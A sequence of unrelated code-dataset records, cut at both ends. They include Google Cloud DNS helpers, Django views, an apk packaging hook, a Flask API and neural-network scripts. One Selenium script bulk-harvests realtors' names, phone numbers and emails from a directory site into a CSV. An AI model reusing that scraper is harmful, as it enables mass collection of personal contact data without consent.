inválido')\r\n\r\nPrograma().main()","sub_path":"Lets_code/Lógica_de_programação_orientada_a_objetos/Aula_08/ex06_programa.py","file_name":"ex06_programa.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178139618","text":"\"\"\"The main shortcut methods for interacting with the Google Cloud DNS API.\"\"\"\n\nfrom gcloud.credentials import Credentials\nfrom gcloud.dns.connection import Connection\n\n#: Version of this 
package.\n__version__ = '0.1'\n\n#: Auth scope used for DNS.\nDNS_SCOPE = 'https://www.googleapis.com/auth/ndev.clouddns.readwrite'\n\n\ndef get_connection(project, email, private_key_path, scopes=None):\n \"\"\"Shortcut for establishing a connection with Cloud DNS.\n\n :type project: string\n :param project: The name of the project to connect to.\n\n :type client_email: string\n :param client_email: The e-mail attached to the service account.\n\n :type private_key_path: string\n :param private_key_path: The path to a private key file (this file was\n given to you when you created the service\n account).\n\n :rtype: :class:`gcloud.dns.connection.Connection`\n :returns: A connection defined with the proper credentials.\n \"\"\"\n scopes = scopes or DNS_SCOPE\n credentials = Credentials.get_for_service_account(\n email, private_key_path, scopes)\n return Connection(credentials=credentials, project=project)\n\n\ndef get_zone(zone, project, email, private_key_path):\n \"\"\"Shortcut for fetching a managed zone from Cloud DNS.\n\n If you already have a zone, this function will likely be your quickest entry\n point.\n\n :type zone: string\n :param zone: The name of the managed zone to fetch.\n\n :type project: string\n :param project: The name of the project to connect to.\n\n :type client_email: string\n :param client_email: The e-mail attached to the service account.\n\n :type private_key_path: string\n :param private_key_path: The path to a private key file (this file was\n given to you when you created the service\n account).\n\n :rtype: :class:`gcloud.dns.resources.Zone`\n :returns: A connection defined with the proper credentials.\n \"\"\"\n connection = get_connection(project, email, private_key_path)\n return connection.get_zone(zone)\n\n","sub_path":"gcloud/dns/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267809808","text":"\"\"\"\nScript to convert Collections CSV file to OCL-formatted JSON\n\"\"\"\nfrom csv_to_json_flex import ocl_csv_to_json_flex\n\ncsv_filename = 'dhis2datasets.csv'\noutput_filename = 'dhis2datasets.jsonl'\n\ncsv_resource_definitions = [\n {\n 'definition_name': 'DATIM-Collections',\n 'is_active': True,\n 'resource_type': 'Collection',\n 'id_column': 'OCL: Collection',\n 'skip_if_empty_column': 'OCL: Collection',\n ocl_csv_to_json_flex.DEF_CORE_FIELDS: [\n {'resource_field': 'owner', 'value': 'PEPFAR'},\n {'resource_field': 'owner_type', 'value': 'Organization'},\n {'resource_field': 'name', 'column': 'Dataset: shortname'},\n {'resource_field': 'full_name', 'column': 'Dataset: fullname'},\n {'resource_field': 'default_locale', 'value': 'en'},\n {'resource_field': 'supported_locales', 'value': 'en'},\n {'resource_field': 'short_code', 'column': 'OCL: Collection'},\n {'resource_field': 'collection_type', 'value': 'Subset'},\n {'resource_field': 'public_access', 'value': 'View'},\n {'resource_field': 'external_id', 'column': 'ZenDesk: Dataset'},\n ],\n ocl_csv_to_json_flex.DEF_KEY_VALUE_PAIRS: {\n 'extras': [\n {'key': 'Period', 'value_column': 'OCL: Period', 'omit_if_empty_value': True},\n {'key': 'DHIS2-Dataset-Code', 'value_column': 'Dataset: code', 'omit_if_empty_value': True},\n {'key_column': 'OCL: Active Sync Attribute', 'value': True}\n ]\n }\n },\n {\n 'definition_name': 'DATIM-CollectionVersions',\n 'is_active': True,\n 'resource_type': 'Collection Version',\n 'skip_if_empty_column': 'OCL: Collection',\n 
ocl_csv_to_json_flex.DEF_CORE_FIELDS: [\n {'resource_field': 'owner', 'value': 'PEPFAR'},\n {'resource_field': 'owner_type', 'value': 'Organization'},\n {'resource_field': 'collection', 'column': 'OCL: Collection'},\n {'resource_field': 'id', 'value': 'initial'},\n {'resource_field': 'description', 'value': 'Automatically generated empty repository version'},\n {'resource_field': 'released', 'value': True}\n ],\n },\n]\n\ncsv_converter = ocl_csv_to_json_flex(output_filename, csv_filename, csv_resource_definitions, verbose=0)\ncsv_converter.process_by_definition()\n","sub_path":"init/csv2json_dhis2datasets.py","file_name":"csv2json_dhis2datasets.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307324700","text":"from django.shortcuts import render, render_to_response\nfrom .models import Books\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom .forms import CreateForm\nfrom django.views.generic import CreateView, ListView, DetailView, TemplateView\nfrom django.views.generic.edit import UpdateView, DeleteView\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.template import Context\n\ndef index(request):\n if request.user.is_authenticated:\n return render(request,'books/index.html')\n else:\n return render_to_response('books/index.html')\n\ndef aboutus(request):\n if request.user.is_authenticated:\n return render(request,'books/aboutUs.html')\n else:\n return render_to_response('books/aboutUs.html')\n\ndef search(request):\n if request.user.is_authenticated:\n query_results = Books.objects.all().filter(genre__iexact = request.GET.get('g', '')).exclude(user_id = request.user.id)\n else:\n query_results = Books.objects.all().filter(genre__iexact = request.GET.get('g', ''))\n return render(request,'books/books_view.html',{'query_results':query_results})\n\ndef searchbox(request):\n if request.user.is_authenticated:\n query_results = Books.objects.all().filter(name__iexact = request.GET.get('key', '')).exclude(user_id = request.user.id)\n else:\n query_results = Books.objects.all().filter(name__iexact = request.GET.get('key', ''))\n return render(request,'books/books_view.html',{'query_results':query_results})\n\nclass BooksCreate(CreateView):\n form_class = CreateForm\n model = Books\n success_url = reverse_lazy('books_list')\n\n def get_form_kwargs(self):\n kwargs = super(BooksCreate, self).get_form_kwargs()\n kwargs.update({'request': self.request})\n return kwargs\n\n@method_decorator(login_required, name='dispatch') \nclass BooksList(ListView):\n model = Books\n context_object_name ='books'\n\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(BooksList, self).dispatch(*args, **kwargs)\n\ndef showbooks(request):\n if request.user.is_authenticated:\n query_results=Books.objects.all().exclude(user_id=request.user.id)\n else:\n query_results=Books.objects.all()\n return render(request, 'books/books_view.html',{'query_results':query_results})\n\nclass BooksView(DetailView):\n model = Books\n context_object_name ='books'\n\nclass BooksUpdate(UpdateView):\n model = Books\n fields = ['name', 'image', 'price', 'author', 'genre', 'isbn', 'edition', 'publisher', 'publishyear']\n success_url = reverse_lazy('books_list')\n\nclass 
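The resource definitions above are essentially column-to-field maps applied per CSV row; a stripped-down, hypothetical version of that pattern (column and field names invented for illustration):

import csv
import json

FIELDS = [('name', 'Dataset: shortname'), ('short_code', 'OCL: Collection')]

def rows_to_json(path):
    with open(path, newline='') as handle:
        for row in csv.DictReader(handle):
            if not row.get('OCL: Collection'):
                continue  # mirrors the skip_if_empty_column behaviour
            yield json.dumps({field: row[column] for field, column in FIELDS})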
BooksDelete(DeleteView):\n model = Books\n success_url = reverse_lazy('books_list')","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610968250","text":"from cbuild.core import logger, paths\nfrom cbuild.apk import create as apk_c, sign as apk_s\n\nimport glob\nimport time\nimport pathlib\nimport subprocess\n\n_hooks = [\n \"pre-install\", \"post-install\",\n \"pre-upgrade\", \"post-upgrade\",\n \"pre-deinstall\", \"post-deinstall\"\n]\n\ndef genpkg(\n pkg, repo, arch, binpkg, destdir = None, dbg = False\n):\n if not destdir:\n destdir = pkg.destdir\n\n if not destdir.is_dir():\n pkg.log_warn(f\"cannot find pkg destdir, skipping...\")\n return\n\n binpath = repo / binpkg\n lockpath = binpath.with_suffix(binpath.suffix + \".lock\")\n\n repo.mkdir(parents = True, exist_ok = True)\n\n while lockpath.is_file():\n pkg.log_warn(f\"binary package being created, waiting...\")\n time.sleep(1)\n\n try:\n lockpath.touch()\n\n metadata = {}\n args = []\n\n pkgdesc = pkg.pkgdesc\n if dbg:\n pkgdesc += \" (debug files)\"\n\n metadata[\"pkgdesc\"] = pkgdesc\n metadata[\"url\"] = pkg.rparent.url\n metadata[\"maintainer\"] = pkg.rparent.maintainer\n #metadata[\"packager\"] = pkg.rparent.maintainer\n metadata[\"origin\"] = pkg.rparent.pkgname\n metadata[\"license\"] = pkg.license\n\n if pkg.rparent.git_revision:\n metadata[\"commit\"] = pkg.rparent.git_revision + (\n \"-dirty\" if pkg.rparent.git_dirty else \"\"\n )\n\n if not dbg and len(pkg.provides) > 0:\n pkg.provides.sort()\n metadata[\"provides\"] = pkg.provides\n\n if pkg.provider_priority > 0:\n metadata[\"provider_priority\"] = pkg.provider_priority\n\n mdeps = []\n\n if not dbg:\n for c in pkg.depends:\n mdeps.append(c)\n else:\n mdeps.append(f\"{pkg.pkgname}={pkg.pkgver}-r{pkg.pkgrel}\")\n\n mdeps.sort()\n metadata[\"depends\"] = mdeps\n\n if not dbg:\n if hasattr(pkg, \"aso_provides\"):\n pkg.aso_provides.sort(key = lambda x: x[0])\n metadata[\"shlib_provides\"] = pkg.aso_provides\n\n if hasattr(pkg, \"so_requires\"):\n pkg.so_requires.sort()\n metadata[\"shlib_requires\"] = pkg.so_requires\n\n if hasattr(pkg, \"pc_provides\"):\n pkg.pc_provides.sort()\n metadata[\"pc_provides\"] = pkg.pc_provides\n\n if hasattr(pkg, \"cmd_provides\"):\n pkg.cmd_provides.sort()\n metadata[\"cmd_provides\"] = pkg.cmd_provides\n\n if hasattr(pkg, \"pc_requires\"):\n pkg.pc_requires.sort()\n metadata[\"pc_requires\"] = pkg.pc_requires\n\n mhooks = []\n for h in _hooks:\n hf = pkg.rparent.template_path / (pkg.pkgname + \".\" + h)\n if hf.is_file():\n mhooks.append((hf.resolve(), h))\n\n if len(mhooks) > 0:\n metadata[\"hooks\"] = mhooks\n\n if len(pkg.triggers) > 0:\n for t in pkg.triggers:\n p = pathlib.Path(t)\n if not p or not p.is_absolute():\n pkg.error(f\"invalid trigger path: {t}\")\n tp = pkg.rparent.template_path / (pkg.pkgname + \".trigger\")\n # if we have triggers, the script must exist\n if not tp.is_file():\n pkg.error(f\"trigger script does not exist\")\n # finally, write the metadata\n metadata[\"trigger\"] = tp.resolve()\n metadata[\"triggers\"] = list(pkg.triggers)\n\n logger.get().out(f\"Creating {binpkg} in repository {repo}...\")\n\n pkgname = pkg.pkgname\n if dbg:\n pkgname += \"-dbg\"\n\n apk_c.create(\n pkgname, f\"{pkg.pkgver}-r{pkg.pkgrel}\", arch,\n pkg.rparent.source_date_epoch, destdir, pkg.statedir, binpath,\n pkg.rparent.signing_key, metadata\n )\n finally:\n lockpath.unlink()\n\ndef 
invoke(pkg):\n arch = pkg.rparent.profile().arch\n binpkg = f\"{pkg.pkgname}-{pkg.pkgver}-r{pkg.pkgrel}.apk\"\n binpkg_dbg = f\"{pkg.pkgname}-dbg-{pkg.pkgver}-r{pkg.pkgrel}.apk\"\n\n repo = paths.repository() / pkg.rparent.repository\n\n if pkg.pkgname.endswith(\"-dbg\"):\n repo = repo / \"debug\"\n\n repo = repo / arch\n\n genpkg(pkg, repo, arch, binpkg)\n\n for sp in pkg.rparent.subpkg_list:\n if sp.pkgname == f\"{pkg.rparent.pkgname}-dbg\":\n # if there's an explicit subpkg for -dbg, don't autogenerate\n return\n\n dbgdest = pkg.rparent.destdir_base / f\"{pkg.pkgname}-dbg-{pkg.pkgver}\"\n\n # don't have a dbg destdir\n if not dbgdest.is_dir():\n return\n\n repo = paths.repository() / pkg.rparent.repository / \"debug\" / arch\n\n genpkg(pkg, repo, arch, binpkg_dbg, dbgdest, True)\n","sub_path":"src/cbuild/hooks/do_pkg/00_gen_apk.py","file_name":"00_gen_apk.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23730518","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom lxml import html\nimport csv\nimport time\nimport urllib.request\nimport random\nimport json, re\n\n\ndef parse_page(htmlstring, driver):\n print(\"--------------------START---------------------\")\n detail_Btns = driver.find_elements_by_xpath(\"//table[@class='rgMasterTable']/tbody//tr/td[1]\")\n \n for page in range(1, 238):\n if page >= 109:\n for i in range(1, len(detail_Btns) + 1):\n \n phone_data = {\n \"phone1\" : \"\",\n \"phone2\" : \"\",\n \"phone3\" : \"\",\n \"phone34\" : \"\"\n }\n\n email_data = {\n \"email1\" : \"\",\n \"email2\" : \"\",\n \"email3\" : \"\",\n \"email4\" : \"\"\n }\n \n last_name = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[2]\".format(i)).text \n \n first_name = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[3]\".format(i)).text\n \n company_name = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[4]\".format(i)).text\n \n city = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[5]\".format(i)).text\n \n detail_btn = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody//tr[{}]/td[1]/a\".format(i))\n \n driver.execute_script(\"arguments[0].click();\", detail_btn)\n time.sleep(2)\n \n phones = re.findall(r'[(][\\d]{3}[)][ ]?[\\d]{3}-[\\d]{4}', driver.page_source)\n\n emails = re.findall(r'[\\w\\.-]+@[\\w\\.-]+', driver.page_source)\n \n for phone in range(1, len(phones) + 1):\n phone_data[\"phone{}\".format(phone)] = phones[phone - 1]\n \n for email in range(1, len(emails) + 1):\n if email % 2 == 1:\n email_data[\"email{}\".format(email)] = emails[email - 1]\n\n \n print(\"Last Name----------------------> : \", last_name)\n print(\"First Name---------------------> : \", first_name)\n print(\"Company Name-------------------> : \", company_name)\n print(\"City---------------------------> : \", city)\n print(\"Phone--------------------------> : \", phone_data)\n print(\"Email--------------------------> : \", email_data)\n \n with open(\"columbus.csv\", \"a\", newline=\"\", encoding='utf-8') as f:\n writer = csv.writer(f)\n writer.writerow([last_name, 
first_name, company_name, city, phone_data[\"phone1\"], phone_data[\"phone2\"], email_data[\"email1\"], email_data[\"email3\"]])\n \n back_btn = driver.find_element_by_id(\"ctl00_body_primary_body_1_ctl01_ucSearchResults_lkbBackToSearch\")\n \n driver.execute_script(\"arguments[0].click();\", back_btn)\n time.sleep(0.3)\n \n nextpage_Btn = driver.find_element_by_class_name(\"rgPageNext\")\n driver.execute_script(\"arguments[0].click();\", nextpage_Btn) \n time.sleep(0.3) \n \n\nif __name__ == \"__main__\":\n \n open('columbus.csv', 'wb').close()\n header = [\"Last Name\", \"First Name\", \"Company Name\", \"City\", \"Phone1\", \"Phone2\", \"Email1\", \"Email2\"]\n with open('columbus.csv', \"a\", newline=\"\") as f:\n csv_writer = csv.DictWriter(f, fieldnames=header, lineterminator='\\n')\n csv_writer.writeheader()\n \n path = \"driver\\\\chromedriver.exe\"\n driver = Chrome(executable_path=path)\n \n driver.maximize_window()\n time.sleep(2)\n \n driver.get(\"https://columbusrealtors.com/find.aspx?mode=browse&letter=\")\n parse_page(driver.page_source, driver)\n \n \n ","sub_path":"columbusrealtors/columbus.py","file_name":"columbus.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588246945","text":"import re\n\ntext01 = 'Grab your bow ties and bouquets! #MarriageEquality in #Illinois, officially goes into effect statewide today. #NOH8 pic.twitter.com/vhsKqiWN9f,'\n\nmentions = re.findall(r'[#]\\w*', text01)\nimages = re.findall(r'\\w{3}\\.\\w{7}\\.\\w{3}\\/.+\\w', text01)\nboundary = re.findall(r'\\pic.twitter.com/\\w+', text01)\ncase = re.findall(r'\\grab', text01, flags=re.IGNORECASE)\n\nprint('mentions: ' + str(mentions))\nprint('images: ' + str(images))\nprint('boundary: ' + str(boundary))\nprint('case: ' + str(case))\n\n'''\n\\d matches any number\n\\D matches any non number\n\\s matches any space\n\\S matches any non space\n\\w matches any letter\n\\W matches any non letter\n\\b matches word boundaries\n\n. matches anything\n\\. matches period\n\n+ matches one or more\n* matches 0 or more\n? 
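A self-contained check of the two extraction patterns used by the scraper above (the sample page text here is invented):

import re

page = 'Call (614) 555-0199 or write to jane.doe@example.com'
phones = re.findall(r'[(][\d]{3}[)][ ]?[\d]{3}-[\d]{4}', page)
emails = re.findall(r'[\w\.-]+@[\w\.-]+', page)
print(phones, emails)  # ['(614) 555-0199'] ['jane.doe@example.com']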
matches 0 or 1\n\n^ matches the beginning of the string\n$ matches the end of the string\n\n[] matches anything in the brackets\n| or\n\n\nFLAGS\nflags=re.IGNORECASE\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''","sub_path":"practice/python/regex01.py","file_name":"regex01.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"498267188","text":"#!/usr/bin/env python\n\n#~ Copyright 2014 Wieger Wesselink.\n#~ Distributed under the Boost Software License, Version 1.0.\n#~ (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)\n\nimport glob\nimport os\nimport os.path\nimport re\nimport sys\nimport yaml\nimport StringIO\n\ndef remove_ext(name):\n return re.sub(r'\\.\\w+$', '', name)\n\ndef generate_dotfile(ymlfile):\n out = StringIO.StringIO()\n out.write('digraph G {\\n')\n f = open(ymlfile)\n data = yaml.safe_load(f)\n f.close()\n tools = data['tools']\n nodes = data['nodes']\n for node in sorted(nodes):\n out.write(' %s [label=\"%s: %s\"];\\n' % (remove_ext(node), node, nodes[node]))\n toolindex = 1\n for name in tools:\n tool = tools[name]\n toolname = 'tool%d' % toolindex\n toolindex = toolindex + 1\n out.write(' %s [shape=box, label=\"%s\"];\\n' % (toolname, name + ': ' + tool['name'] + ' ' + ' '.join(tool['args'])))\n for src in tool['input']:\n out.write(' %s -> %s;\\n' % (remove_ext(src), toolname))\n for dest in tool['output']:\n out.write(' %s -> %s;\\n' % (toolname, remove_ext(dest)))\n out.write('}\\n')\n dotfile = remove_ext(ymlfile) + '.dot'\n pdffile = remove_ext(ymlfile) + '.pdf'\n with open(dotfile, 'w') as text_file:\n text_file.write(out.getvalue())\n os.system('dot -Tpdf %s -o %s' % (dotfile, pdffile))\n\nif len(sys.argv)
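One caution on the regex01.py record above: its boundary and case patterns escape ordinary letters (\p and \g), which current versions of Python's re module reject as bad escapes; working equivalents for the same intent:

import re

text = 'Grab your bow ties! #NOH8 pic.twitter.com/vhsKqiWN9f'
images = re.findall(r'pic\.twitter\.com/\w+', text)     # escape dots, not letters
grabs = re.findall(r'grab', text, flags=re.IGNORECASE)
starts = re.findall(r'^Grab', text)                     # ^ anchors the start, $ the end
print(images, grabs, starts)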
!= 2:\n    print('Usage: draw <path> where <path> is a yml file or a directory containing yml files')\n    sys.exit(1)\nif os.path.isdir(sys.argv[1]):\n    files = glob.glob(os.path.join(sys.argv[1], '*.yml'))\nelse:\n    files = [sys.argv[1]]\nfor ymlfile in files:\n    generate_dotfile(ymlfile)\nif len(files) == 1:\n    ymlfile = files[0]\n    pdffile = remove_ext(ymlfile) + '.pdf'\n    os.system('evince \"%s\"' % pdffile)\n","sub_path":"newtest/python/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"113141192","text":"#\r\n# types of documents (extension of BiBTex categories)\r\n#\r\n\r\n\r\n\r\narticleType = [\r\n\"article\",\r\n\"article published in peer-reviewed journal\"\r\n]\r\n\r\nbookType = [\r\n\"book\",\r\n\"complete book\"\r\n]\r\n\r\nbookChapterType = [\r\n\"inbook\",\r\n\"chapter of book, article of encyclopedia ...\",\r\n]\r\n\r\ncourseType = [\r\n\"course\",\r\n\"on-line course\"\r\n]\r\n\r\ndataSetType = [\r\n\"dataSet\",\r\n\"experimental data\",\r\n]\r\n\r\ninProceedingsType = [\r\n\"inproceedings\",\r\n\"article or abstract published in conference \",\r\n]\r\n\r\nmanualType = [\r\n\"manual\",\r\n\"any manual or tutorial, on-line documentation ...\",\r\n]\r\n\r\nmastersThesisType = [\r\n\"mastersthesis\",\r\n\"master's thesis\",\r\n]\r\n\r\npatentType = [\r\n\"patent\",\r\n\"patent (filed or published)\",\r\n]\r\n\r\nphdThesisType = [\r\n\"phdthesis\",\r\n\"doctorate dissertation\",\r\n]\r\n\r\nposterType = [\r\n\"poster\",\r\n\"poster presented in conference, exposition ... \",\r\n]\r\n\r\npresentationType = [\r\n\"presentation\",\r\n\"public presentation, powerpoint, multimedia ...\",\r\n]\r\n\r\nproceedingsType = [\r\n\"proceedings\",\r\n\"complete proceedings of conference, workshop ...\",\r\n]\r\n\r\nprotocolType = [\r\n\"protocol\",\r\n\"test protocol = ftk doc procedure\",\r\n]\r\n\r\n\r\nsoftwareType = [\r\n\"software\",\r\n\"software setup, sources ...\",\r\n]\r\n\r\nstudentReportType = [\r\n\"studentreport\",\r\n\"student report other than master and phd\",\r\n]\r\n\r\n\r\ntechnicalReportType = [\r\n\"techreport\",\r\n\"ANY report, technical or not\",\r\n]\r\n\r\n\r\ntutorialType = [\r\n\"tutorial\",\r\n\"tutorial of laboratory equipment = ftk doc procedure\",\r\n]\r\n\r\ndocumentType = [\r\n\"document\",\r\n\"any other document\",\r\n]\r\n\r\nnonDocumentType = [\r\n\"misc\",\r\n\"any other file and/or folder\",\r\n]\r\n\r\n\r\n\r\n\r\n","sub_path":"Partie étudiant/basicKeyLogger/library/api/type_configuration.py","file_name":"type_configuration.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348502560","text":"from utils import *\n\n# **************************************************\n# MICCAI16 MSSEG lesion segmentation challenge\n# Simple 2D approach incorporating post-processing\n#\n#\n# **************************************************\n\n\n\n# data options\noptions = {}\noptions['folder'] = '/home/s/w/CNN/images/CH16'\noptions['use_flair'] = True\noptions['use_pd'] = True\noptions['use_t2'] = True\noptions['use_gado'] = False\noptions['use_t1'] = True\noptions['flair'] = 'FLAIR_preprocessed.nii.gz'\noptions['pd'] = 'DP_preprocessed.nii.gz'\noptions['t2'] = 'T2_preprocessed.nii.gz'\noptions['gado'] = 'GADO_preprocessed.nii.gz'\noptions['t1'] = 'T1_preprocessed.nii.gz'\noptions['mask'] = 'Consensus.nii.gz'\noptions['out_mask'] = 'estimated_lesion_mask.nii.gz'\n\n\n# post-processing options\n
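# note: min_th thresholds the CNN probability map; min_lesion_size and perc_wm\n# look like size and white-matter-overlap filters for candidate lesions\n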
options['min_th'] = 0.5\noptions['min_lesion_size'] = 30\noptions['perc_wm'] = 0.4\n\n# net options\noptions['patch_size'] = [15,15,1]\noptions['pool_size'] = 200\noptions['patience'] = 15\noptions['net_model'] = '15_2D3'\noptions['verbose'] = 10\noptions['max_epochs'] = 100\noptions['train_split'] = 0.25\noptions['batch_size'] = 500000\noptions['train'] = False\n\noptions['net_layer'] =[\n    (InputLayer, dict(name='in', shape=(None, 4, 15, 15))),\n    (Conv2DDNNLayer, dict(name='conv1_1', num_filters=32, filter_size=(5,5), pad='same',W= GlorotUniform())),\n    (MaxPool2DDNNLayer, dict(name='maxpool_1', pool_size=2, stride=2)), \n    (Conv2DDNNLayer, dict(name='conv2_1', num_filters=64, filter_size=(5, 5), pad='same',W= GlorotUniform())),\n    (MaxPool2DDNNLayer, dict(name='maxpool_2', pool_size=2, stride=2)), \n    (DropoutLayer, dict(name='l2drop', p=0.5)),\n    (DenseLayer, dict(name='l1', num_units=256)),\n    (DenseLayer, dict(name='out', num_units=2, nonlinearity=nonlinearities.softmax)),\n    ]\n\n\n\n# *****************************************************************************\n# CODE\n# *****************************************************************************\n\nclassify_images(options)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"147703492","text":"#!/usr/bin/python3\n\"\"\" Start the api \"\"\"\nfrom flask import Blueprint, Flask, jsonify\nfrom models import storage\nfrom api.v1.views import app_views\nimport os\nfrom flask_cors import CORS\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"0.0.0.0\"}})\napp.url_map.strict_slashes = False\napp.register_blueprint(app_views)\n\n\n@app.teardown_appcontext\ndef teardown(err):\n    \"\"\" function to close storage \"\"\"\n    storage.close()\n\n\n@app.errorhandler(404)\ndef pagenotfound(e):\n    \"\"\" handle error 404 \"\"\"\n    return jsonify({\"error\": \"Not found\"}), 404\n\nif __name__ == \"__main__\":\n    host = os.environ.get('HBNB_API_HOST', '0.0.0.0')\n    port = os.environ.get('HBNB_API_PORT', '5000')\n    app.run(host=host, port=int(port), threaded=True)\n","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558862268","text":"# Emir Zamwa (emirz), Oblig2 INF3490\n'''\n    This file was used to plug in the values used in the lectures and check\n    whether I got the correct values out. It was useful for finding a lot of mistakes and bugs.\n    Tested with and without sigmoid. Without sigmoid, the final values\n    matched those from the lectures. 
Tested with sigmoid, corrected\n    a few mistakes here and there, and then got correct values with sigmoid too.\n    Fixed the failures in the original mlp file as I found them here in the\n    test file.\n'''\n\nimport numpy as np\nimport random\nimport copy\n\n# ****************************************************************************\nclass test:\n    def __init__(self, inputs, targets, nhidden):\n        self.beta = 1; self.eta = 0.1; self.momentum = 0.0\n        self.inputs = inputs\n        self.input_weights = []\n        self.hidden_weights = []\n        self.nhidden = nhidden\n        self.target = targets\n\n\n        for i in range(0, len(self.inputs) + 1):\n            self.input_weights.append([])\n            self.hidden_weights.append([])\n        self.input_weights[0].append(-1)\n        self.input_weights[0].append(0)\n        self.input_weights[1].append(0)\n        self.input_weights[1].append(1)\n        self.input_weights[2].append(1)\n        self.input_weights[2].append(1)\n\n        self.hidden_weights[0].append(1)\n        self.hidden_weights[0].append(-1)\n        self.hidden_weights[1].append(0)\n        self.hidden_weights[1].append(1)\n        self.hidden_weights[2].append(1)\n        self.hidden_weights[2].append(1)\n\n        self.hidden_activations = np.zeros(2)\n        self.output_activations = np.zeros(2)\n        self.train(self.inputs, self.target)\n        #self.forward(self.inputs)\n    # ****************************************************************************\n\n    # The main training method\n    def train(self, inputs, targets, iterations=1):\n        for iter in range(0, iterations):\n            inputKopi, hiddenKopi = self.forward(inputs)\n            output_deltas = [0] * 2\n            hidden_deltas = [0] * self.nhidden\n            old_hidden_weights = copy.deepcopy(self.hidden_weights)\n            old_input_weights = copy.deepcopy(self.input_weights)\n\n            # Calculating delta values for outputs in the first for loop.\n            # in addition, also updating hidden weights with new ones\n            for i in range(0, 2):\n                delta = ((self.output_activations[i] - targets[i]) * \\\n                self.output_activations[i]*(1-self.output_activations[i]))\n                output_deltas[i] = delta\n                for j in range(0, self.nhidden + 1):\n                    temp = self.hidden_weights[j][i]\n                    updated_weight = (temp - \\\n                    (self.eta * output_deltas[i] * hiddenKopi[j]))\n                    self.hidden_weights[j][i] = updated_weight\n\n            print(output_deltas)\n\n            # Calculating delta values for hidden layer\n            for i in range(0, self.nhidden):\n                delta = 0\n                for j in range(0, 2):\n                    delta += output_deltas[j] * old_hidden_weights[i][j]\n                hidden_deltas[i] = (delta * \\\n                self.hidden_activations[i]*(1-self.hidden_activations[i]))\n\n            print(hidden_deltas)\n\n            # Updating input weights\n            for i in range(0, self.nhidden):\n                for j in range(0, len(inputKopi)):\n                    temp = self.input_weights[j][i]\n                    updated_weight = (temp - \\\n                    (self.eta * hidden_deltas[i] * inputKopi[j]))\n                    self.input_weights[j][i] = updated_weight\n\n            print(\"New hiddens: \" + str(self.hidden_activations))\n            print(\"New outputs: \" + str(self.output_activations))\n            print(\"New inputW: \" + str(self.input_weights))\n            print(\"New hiddenW: \" + str(self.hidden_weights))\n            print(\"\")\n\n    # *****************************************************************************\n\n    # This function clamps the list\n    def clamp_values(self, outputs):\n        max_value = max(outputs)\n        clamped = np.zeros(len(outputs))\n\n        for i in range(0, len(outputs)):\n            if outputs[i] == max_value:\n                clamped[i] = 1.0\n                break\n\n        return clamped\n\n    # *****************************************************************************\n\n    '''\n    This method goes from left to right of the system, and calculates the\n    values of each node in the hidden layer, and also the values of the output.\n    By 
values I mean activations.\n    '''\n    def forward(self, inputs):\n        # Making copies of lists and adding the bias so it is included in\n        # calculations of values. That's why each for-loop goes to + 1.\n        inputKopi = np.append(inputs, self.beta)\n        hiddenKopi = np.append(self.hidden_activations, self.beta)\n\n        for i in range(0, self.nhidden):\n            value = 0.0\n            for j in range(0, len(inputs) + 1):\n                # Using the formula from slides to give values to hidden nodes\n                value += inputKopi[j] * self.input_weights[j][i]\n            self.hidden_activations[i] = value\n        # Sigmoid\n        for i in range(0, self.nhidden):\n            self.hidden_activations[i] = (\\\n            1/(1 + np.exp(-self.beta * self.hidden_activations[i])))\n            hiddenKopi[i] = self.hidden_activations[i]\n\n\n        # Same principle as above, but with the outputs\n        for i in range(0, 2):\n            value = 0.0\n            for j in range(0, self.nhidden + 1):\n                value += hiddenKopi[j] * self.hidden_weights[j][i]\n            self.output_activations[i] = value\n        # Sigmoid\n        